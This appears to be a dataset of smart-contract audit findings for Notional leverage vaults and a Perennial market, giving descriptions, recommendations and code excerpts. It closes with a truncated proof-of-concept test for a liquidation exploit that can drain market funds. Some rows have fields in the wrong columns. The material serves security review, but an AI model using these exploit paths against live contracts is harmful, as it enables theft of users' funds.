name
stringlengths
5
231
severity
stringclasses
3 values
description
stringlengths
107
68.2k
recommendation
stringlengths
12
8.75k
impact
stringlengths
3
11.2k
function
stringlengths
15
64.6k
Native ETH not received when removing liquidity from Curve V2 pools
high
Native ETH was not received when removing liquidity from Curve V2 pools due to the mishandling of Native ETH and WETH, leading to a loss of assets.\\nCurve V2 pool will always wrap to WETH and send to leverage vault unless the `use_eth` is explicitly set to `True`. Otherwise, it will default to `False`. The following implementation of the `remove_liquidity_one_coin` function taken from one of the Curve V2 pools shows that unless the `use_eth` is set to `True`, the `WETH.deposit()` will be triggered to wrap the ETH, and WETH will be transferred back to the caller. The same is true for the `remove_liquidity` function, but it is omitted for brevity.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, "Slippage"\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b"", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id("transfer(address,uint256)")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n\\nNotional's Leverage Vault only works with Native ETH. It was found that the `remove_liquidity_one_coin` and `remove_liquidity` functions are executed without explicitly setting the `use_eth` parameter to `True`. Thus, WETH instead of Native ETH will be returned during remove liquidity. As a result, these WETH will not be accounted for in the vault and result in a loss of assets.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n } else {\\n // Redeem proportionally, min amounts are rewritten to a fixed length array\\n uint256[2] memory minAmounts;\\n minAmounts[0] = _minAmounts[0];\\n minAmounts[1] = _minAmounts[1];\\n\\n uint256[2] memory _exitBalances = pool.remove_liquidity(poolClaim, minAmounts);\\n exitBalances[0] = _exitBalances[0];\\n exitBalances[1] = _exitBalances[1];\\n }\\n```\\n
If one of the pool tokens is ETH, consider setting `is_eth` to true when calling `remove_liquidity_one_coin` and `remove_liquidity` functions to ensure that Native ETH is sent back to the vault.
Following are some of the impacts due to the mishandling of Native ETH and WETH during liquidity removal in Curve pools, leading to loss of assets:\\nWithin the `redeemFromNotional`, if the vaults consist of ETH, the `_UNDERLYING_IS_ETH` will be set to true. In this case, the code will attempt to call `transfer` to `transfer` Native ETH, which will fail as Native ETH is not received and users/Notional are unable to redeem.\\n`File: BaseStrategyVault.sol\\n175: function redeemFromNotional(\\n..SNIP..\\n199: if (_UNDERLYING_IS_ETH) {\\n200: if (transferToReceiver > 0) payable(receiver).transfer(transferToReceiver);\\n201: if (transferToNotional > 0) payable(address(NOTIONAL)).transfer(transferToNotional);\\n202: } else {\\n..SNIP..`\\nWETH will be received instead of Native ETH during the emergency exit. During vault restoration, WETH is not re-entered into the pool as only Native ETH residing in the vault will be transferred to the pool. Leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will be converted to Native ETH (0x0 or 0xEeeee) during deployment/initialization. Thus, the WETH is stuck in the vault. This causes the value per share to drop significantly. (Reference)\\n`File: SingleSidedLPVaultBase.sol\\n480: function emergencyExit(\\n481: uint256 claimToExit, bytes calldata /* data */\\n482: ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n483: StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n484: if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n485: \\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n490: \\n491: state.totalPoolClaim = state.totalPoolClaim - claimToExit;\\n492: state.setStrategyVaultState();`
```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity_one_coin(token_amount: uint256, i: uint256, min_amount: uint256,\\n use_eth: bool = False, receiver: address = msg.sender) -> uint256:\\n A_gamma: uint256[2] = self._A_gamma()\\n\\n dy: uint256 = 0\\n D: uint256 = 0\\n p: uint256 = 0\\n xp: uint256[N_COINS] = empty(uint256[N_COINS])\\n future_A_gamma_time: uint256 = self.future_A_gamma_time\\n dy, p, D, xp = self._calc_withdraw_one_coin(A_gamma, token_amount, i, (future_A_gamma_time > 0), True)\\n assert dy >= min_amount, "Slippage"\\n\\n if block.timestamp >= future_A_gamma_time:\\n self.future_A_gamma_time = 1\\n\\n self.balances[i] -= dy\\n CurveToken(self.token).burnFrom(msg.sender, token_amount)\\n\\n coin: address = self.coins[i]\\n if use_eth and coin == WETH20:\\n raw_call(receiver, b"", value=dy)\\n else:\\n if coin == WETH20:\\n WETH(WETH20).deposit(value=dy)\\n response: Bytes[32] = raw_call(\\n coin,\\n _abi_encode(receiver, dy, method_id=method_id("transfer(address,uint256)")),\\n max_outsize=32,\\n )\\n if len(response) != 0:\\n assert convert(response, bool)\\n```\\n
Single-sided instead of proportional exit is performed during emergency exit
high
Single-sided instead of proportional exit is performed during emergency exit, which could lead to a loss of assets during emergency exit and vault restoration.\\nPer the comment in Line 476 below, the BPT should be redeemed proportionally to underlying tokens during an emergency exit. However, it was found that the `_unstakeAndExitPool` function is executed with the `isSingleSided` parameter set to `true`.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n\\nIf the `isSingleSided` is set to `True`, the `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` will be used, which is incorrect. Per the Balancer's documentation, `EXACT_BPT_IN_FOR_ONE_TOKEN_OUT` is a single asset exit where the user sends a precise quantity of BPT, and receives an estimated but unknown (computed at run time) quantity of a single token.\\nTo perform a proportional exit, the `EXACT_BPT_IN_FOR_TOKENS_OUT` should be used instead.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n bool success = AURA_REWARD_POOL.withdrawAndUnwrap(poolClaim, false); // claimRewards = false\\n require(success);\\n\\n bytes memory customData;\\n if (isSingleSided) {\\n..SNIP..\\n uint256 primaryIndex = PRIMARY_INDEX();\\n customData = abi.encode(\\n IBalancerVault.ComposableExitKind.EXACT_BPT_IN_FOR_ONE_TOKEN_OUT,\\n poolClaim,\\n primaryIndex < BPT_INDEX ? primaryIndex : primaryIndex - 1\\n );\\n```\\n\\nThe same issue affects the Curve's implementation of the `_unstakeAndExitPool` function.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _unstakeAndExitPool(\\n uint256 poolClaim, uint256[] memory _minAmounts, bool isSingleSided\\n ) internal override returns (uint256[] memory exitBalances) {\\n..SNIP..\\n ICurve2TokenPool pool = ICurve2TokenPool(CURVE_POOL);\\n exitBalances = new uint256[](2);\\n if (isSingleSided) {\\n // Redeem single-sided\\n exitBalances[_PRIMARY_INDEX] = pool.remove_liquidity_one_coin(\\n poolClaim, int8(_PRIMARY_INDEX), _minAmounts[_PRIMARY_INDEX]\\n );\\n```\\n
Set the `isSingleSided` parameter to `false` when calling the `_unstakeAndExitPool` function to ensure that the proportional exit is performed.\\n```\\nfunction emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n ..SNIP..\\n// Remove the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n// Add the line below\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), false);\\n```\\n
The following are some of the impacts of this issue, which lead to loss of assets:\\nRedeeming LP tokens one-sided incurs unnecessary slippage as tokens have to be swapped internally to one specific token within the pool, resulting in fewer assets received.\\nPer the source code comment below, in other words, unless a proportional exit is performed, the emergency exit will be subjected to front-run attack and slippage.\\n`File: SingleSidedLPVaultBase.sol\\n486: // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n487: // in a proportional exit. Front running will not have an effect since no trading will\\n488: // occur during a proportional exit.\\n489: _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);`\\nAfter the emergency exit, the vault only held one of the pool tokens. To re-enter the pool, the vault has to either swap the token to other pool tokens on external DEXs to maintain the proportion or perform a single-sided join. Both of these methods will incur unnecessary slippage, resulting in fewer LP tokens received at the end.
```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Allows the emergency exit role to trigger an emergency exit on the vault.\\n /// In this situation, the `claimToExit` is withdrawn proportionally to the underlying\\n /// tokens and held on the vault. The vault is locked so that no entries, exits or\\n /// valuations of vaultShares can be performed.\\n /// @param claimToExit if this is set to zero, the entire pool claim is withdrawn\\n function emergencyExit(\\n uint256 claimToExit, bytes calldata /* data */\\n ) external override onlyRole(EMERGENCY_EXIT_ROLE) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (claimToExit == 0) claimToExit = state.totalPoolClaim;\\n\\n // By setting min amounts to zero, we will accept whatever tokens come from the pool\\n // in a proportional exit. Front running will not have an effect since no trading will\\n // occur during a proportional exit.\\n _unstakeAndExitPool(claimToExit, new uint256[](NUM_TOKENS()), true);\\n```\\n
reinvestReward() generates dust totalPoolClaim causing vault abnormal
medium
If the first user deposits too small , due to the round down, it may result in 0 shares, which will result in 0 shares no matter how much is deposited later. In `National`, this situation will be prevented by setting `a minimum borrow size and a minimum leverage ratio`. However, `reinvestReward()` does not have this restriction, which may cause this problem to still exist, causing the vault to enter an abnormal state.\\nThe calculation of the shares of the vault is as follows:\\n```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n\\nIf the first `deposit` is too small, due to the conversion to `INTERNAL_TOKEN_PRECISION`, the precision is lost, resulting in `vaultShares=0`. Subsequent depositors will enter the second calculation, but `totalVaultSharesGlobal=0`, so `vaultShares` will always be `0`.\\nTo avoid this situation, `Notional` has restrictions.\\nhey guys, just to clarify some rounding issues stuff on vault shares and the precision loss. Notional will enforce a minimum borrow size and a minimum leverage ratio on users which will essentially force their initial deposits to be in excess of any dust amount. so we should not really see any tiny deposits that result in rounding down to zero vault shares. If there was rounding down to zero, the account will likely fail their collateral check as the vault shares act as collateral and the would have none. there is the possibility of a dust amount entering into depositFromNotional in a valid state, that would be due to an account "rolling" a position from one debt maturity to another. in this case, a small excess amount of deposit may come into the vault but the account would still be forced to be holding a sizeable position overall due to the minium borrow size.\\nin `reinvestReward()`, not this limit\\n```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n state.totalPoolClaim += poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n\\nFrom the above code, we know that `reinvestReward()` will increase `totalPoolClaim`, but will not increase `totalVaultSharesGlobal`.\\nThis will cause problems in the following scenarios:\\nThe current vault has deposits.\\n`Rewards` have been generated, but `reinvestReward()` has not been executed.\\nThe `bot` submitted the `reinvestReward()` transaction. but step 4 execute first\\nThe users took away all the deposits `totalPoolClaim = 0`, `totalVaultSharesGlobal=0`.\\nAt this time `reinvestReward()` is executed, then `totalPoolClaim > 0`, `totalVaultSharesGlobal=0`.\\nOther users' deposits will fail later\\nIt is recommended that `reinvestReward()` add a judgment of `totalVaultSharesGlobal>0`.\\nNote: If there is a malicious REWARD_REINVESTMENT_ROLE, it can provoke this issue by donating reward token and triggering reinvestReward() before the first depositor appears.
```\\n function reinvestReward(\\n SingleSidedRewardTradeParams[] calldata trades,\\n uint256 minPoolClaim\\n ) external whenNotLocked onlyRole(REWARD_REINVESTMENT_ROLE) returns (\\n address rewardToken,\\n uint256 amountSold,\\n uint256 poolClaimAmount\\n ) {\\n // Will revert if spot prices are not in line with the oracle values\\n _checkPriceAndCalculateValue();\\n\\n // Require one trade per token, if we do not want to buy any tokens at a\\n // given index then the amount should be set to zero. This applies to pool\\n // tokens like in the ComposableStablePool.\\n require(trades.length == NUM_TOKENS());\\n uint256[] memory amounts;\\n (rewardToken, amountSold, amounts) = _executeRewardTrades(trades);\\n\\n poolClaimAmount = _joinPoolAndStake(amounts, minPoolClaim);\\n\\n // Increase LP token amount without minting additional vault shares\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n// Add the line below\\n require(state.totalVaultSharesGlobal > 0 ,"invalid shares");\\n state.totalPoolClaim // Add the line below\\n= poolClaimAmount;\\n state.setStrategyVaultState();\\n\\n emit RewardReinvested(rewardToken, amountSold, poolClaimAmount);\\n }\\n```\\n
reinvestReward() generates dust totalPoolClaim causing vault abnormal
```\\n function _mintVaultShares(uint256 lpTokens) internal returns (uint256 vaultShares) {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n if (state.totalPoolClaim == 0) {\\n // Vault Shares are in 8 decimal precision\\n vaultShares = (lpTokens * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / POOL_PRECISION();\\n } else {\\n vaultShares = (lpTokens * state.totalVaultSharesGlobal) / state.totalPoolClaim;\\n }\\n\\n // Updates internal storage here\\n state.totalPoolClaim += lpTokens;\\n state.totalVaultSharesGlobal += vaultShares.toUint80();\\n state.setStrategyVaultState();\\n```\\n
ETH can be sold during reinvestment
medium
The existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.\\nMultiple instances of this issue were found:\\nInstance 1 - Curve's Implementation\\nThe `_isInvalidRewardToken` function attempts to prevent the callers from selling away ETH during reinvestment.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the code at Line 67 above will not achieve the intended outcome as `Deployments.ALT_ETH_ADDRESS` is not a valid token address in the first place.\\n```\\naddress internal constant ALT_ETH_ADDRESS = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;\\n```\\n\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)) as shown in the TradingUtils's source code, not the `Deployments.ALT_ETH_ADDRESS`.\\n```\\nFile: TradingUtils.sol\\n function _executeTrade(\\n address target,\\n uint256 msgValue,\\n bytes memory params,\\n address spender,\\n Trade memory trade\\n ) private {\\n uint256 preTradeBalance;\\n \\n if (trade.buyToken == address(Deployments.WETH)) {\\n preTradeBalance = address(this).balance;\\n } else if (trade.buyToken == Deployments.ETH_ADDRESS || _needsToUnwrapExcessWETH(trade, spender)) {\\n preTradeBalance = IERC20(address(Deployments.WETH)).balanceOf(address(this));\\n }\\n```\\n\\nAs a result, the caller (bot) of the reinvestment function could still sell off the ETH from the vault, bypassing the requirement.\\nInstance 2 - Balancer's Implementation\\nWhen the caller is executing a trade with ETH, the address for ETH used is either `Deployments.WETH` or `Deployments.ETH_ADDRESS` (address(0)), as mentioned earlier. However, the `AuraStakingMixin._isInvalidRewardToken` function only blocks `Deployments.WETH` but not `Deployments.ETH`, thus allowing the caller (bot) of the reinvestment function, could still sell off the ETH from the vault, bypassing the requirement.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\n
To ensure that ETH cannot be sold off during reinvestment, consider the following changes:\\nCurve\\n```\\nFile: ConvexStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n// Add the line below\\n token == Deployments.ETH ||\\n// Add the line below\\n token == Deployments.WETH ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n}\\n```\\n\\nBalancer\\n```\\nFile: AuraStakingMixin.sol\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n// Add the line below\\n token == address(Deployments.ETH) \\n token == address(Deployments.WETH)\\n );\\n}\\n```\\n
The existing control to prevent ETH from being sold during reinvestment can be bypassed, allowing the bots to accidentally or maliciously sell off the non-reward assets of the vault.
```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n
Leverage Vault on sidechains that support Curve V2 pools is broken
medium
No users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools, leading to the core contract functionality of a vault being broken and a loss of revenue for the protocol.\\nFollowing are examples of some Curve V2 pools in Arbitum:\\nThe code from Line 64 to Line 71 is only executed if the contract resides on Ethereum. As a result, for Arbitrum and Optimism sidechains, the `IS_CURVE_V2` variable is always false.\\n```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n\\nAs a result, code within the `_joinPoolAndStake` function will always call the Curve V1's `add_liquidity` function that does not define the `use_eth` parameter.\\n```\\nFile: Curve2TokenConvexVault.sol\\n function _joinPoolAndStake(\\n..SNIP..\\n // Slightly different method signatures in v1 and v2\\n if (IS_CURVE_V2) {\\n lpTokens = ICurve2TokenPoolV2(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim, 0 < msgValue // use_eth = true if msgValue > 0\\n );\\n } else {\\n lpTokens = ICurve2TokenPoolV1(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim\\n );\\n }\\n```\\n\\nIf the `use_eth` parameter is not defined, it will default to `False`. As a result, the Curve pool expects the caller to transfer over the WETH to the pool and the pool will call `WETH.withdraw` to unwrap the WETH to Native ETH as shown in the code below.\\nHowever, Notional's leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will explicitly convert the address to either the `Deployments.ALT_ETH_ADDRESS` (0xEeeee) or `Deployments.ETH_ADDRESS` (address(0)) during deployment and initialization.\\nThe implementation of the above `_joinPoolAndStake` function will forward Native ETH to the Curve Pool, while the pool expects the vault to transfer in WETH. As a result, a revert will occur since the pool did not receive the WETH it required during the unwrap process.\\n```\\ndef add_liquidity(\\n amounts: uint256[N_COINS],\\n min_mint_amount: uint256,\\n use_eth: bool = False,\\n receiver: address = msg.sender\\n) -> uint256:\\n """\\n @notice Adds liquidity into the pool.\\n @param amounts Amounts of each coin to add.\\n @param min_mint_amount Minimum amount of LP to mint.\\n @param use_eth True if native token is being added to the pool.\\n @param receiver Address to send the LP tokens to. Default is msg.sender\\n @return uint256 Amount of LP tokens received by the `receiver\\n """\\n..SNIP..\\n # --------------------- Get prices, balances -----------------------------\\n..SNIP..\\n # -------------------------------------- Update balances and calculate xp.\\n..SNIP// rest of code\\n # ---------------- transferFrom token into the pool ----------------------\\n\\n for i in range(N_COINS):\\n\\n if amounts[i] > 0:\\n\\n if coins[i] == WETH20:\\n\\n self._transfer_in(\\n coins[i],\\n amounts[i],\\n 0, # <-----------------------------------\\n msg.value, # | No callbacks\\n empty(address), # <----------------------| for\\n empty(bytes32), # <----------------------| add_liquidity.\\n msg.sender, # |\\n empty(address), # <-----------------------\\n use_eth\\n )\\n```\\n\\n```\\ndef _transfer_in(\\n..SNIP..\\n use_eth: bool\\n):\\n..SNIP..\\n @params use_eth True if the transfer is ETH, False otherwise.\\n """\\n\\n if use_eth and _coin == WETH20:\\n assert mvalue == dx # dev: incorrect eth amount\\n else:\\n..SNIP..\\n if _coin == WETH20:\\n WETH(WETH20).withdraw(dx) # <--------- if WETH was transferred in\\n # previous step and `not use_eth`, withdraw WETH to ETH.\\n```\\n
Ensure the `IS_CURVE_V2` variable is initialized on the Arbitrum and Optimism side chains according to the Curve Pool's version.\\nIf there is a limitation on the existing approach to determining a pool is V1 or V2 on Arbitrum and Optimsim, an alternative approach might be to use the presence of a `gamma()` function as an indicator of pool type
No users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools. The deposit function is a core function of any vault. Thus, this issue breaks the core contract functionality of a vault.\\nIn addition, if the affected vaults cannot be used, it leads to a loss of revenue for the protocol.
```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n
Liquidator can liquidate user while increasing user position to any value, stealing all Market funds or bricking the contract
high
When a user is liquidated, there is a check to ensure that after liquidator order executes, `closable = 0`, but this actually doesn't prevent liquidator from increasing user position, and since all position size and collateral checks are skipped during liquidation, this allows malicious liquidator to open position of max possible size (2^62-1) during liquidation. Opening such huge position means the Market contract accounting is basically broken from this point without any ability to restore it. For example, the fee paid (and accumulated by makers) from opening such position will be higher than entire Market collateral balance, so any maker can withdraw full Market balance immediately after this position is settled.\\n`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. For example:\\nLatest position = 10\\nPending position [t=200] = 0\\nPending position [t=300] = 1000\\nIn such scenario `closable = 0` (regardless of position size at t=300).\\nWhen position is liquidated (called `protected` in the code), the following requirements are enforced in _invariant():\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n\\nThe requirements for liquidated positions are:\\nclosable = 0, user position collateral is below maintenance, liquidator withdraws no more than liquidation fee\\nmarket oracle price is not stale\\nfor closed market - order doesn't increase position\\nmaker position doesn't exceed maker limit\\norder and position are single-sided\\nAll the other invariants are skipped for liquidation, including checks for long or short position size and collateral.\\nAs shown in the example above, it's possible for the user to have `closable = 0` while having the new (current) position size of any amount, which makes it possible to succesfully liquidate user while increasing the position size (long or short) to any amount (up to max `2^62-1` enforced when storing position size values).\\nScenario for opening any position size (oracle granularity = 100): T=1: ETH price = $100. User opens position `long = 10` with collateral = min margin ($350) T=120: Oracle version T=100 is commited, price = $100, user position is settled (becomes latest) ... T=150: ETH price starts moving against the user, so the user tries to close the position calling `update(0,0,0,0,false)` T=205: Current price is $92 and user becomes liquidatable (before the T=200 price is commited, so his close request is still pending). Liquidator commits unrequested oracle version T=190, price = $92, user is liquidated while increasing his position: `update(0,2^62-1,0,0,true)` Liquidation succeeds, because user has latest `long = 10`, pending long = 0 (t=200), liquidation pending long = 2^62-1 (t=300). `closable = 0`.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('liquidate with huge open position', async () => {\\nconst positionMaker = parse6decimal('20.000')\\nconst positionLong = parse6decimal('10.000')\\nconst collateral = parse6decimal('1000')\\nconst collateral2 = parse6decimal('350')\\nconst maxPosition = parse6decimal('4611686018427') // 2^62-1\\n\\nconst oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\noracle.status.returns([oracleVersion, TIMESTAMP + 100])\\noracle.request.returns()\\n\\n// maker\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\nawait market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n// user opens long=10\\ndsu.transferFrom.whenCalledWith(user.address, market.address, collateral2.mul(1e12)).returns(true)\\nawait market.connect(user).update(user.address, 0, positionLong, 0, collateral2, false)\\n\\nconst oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: 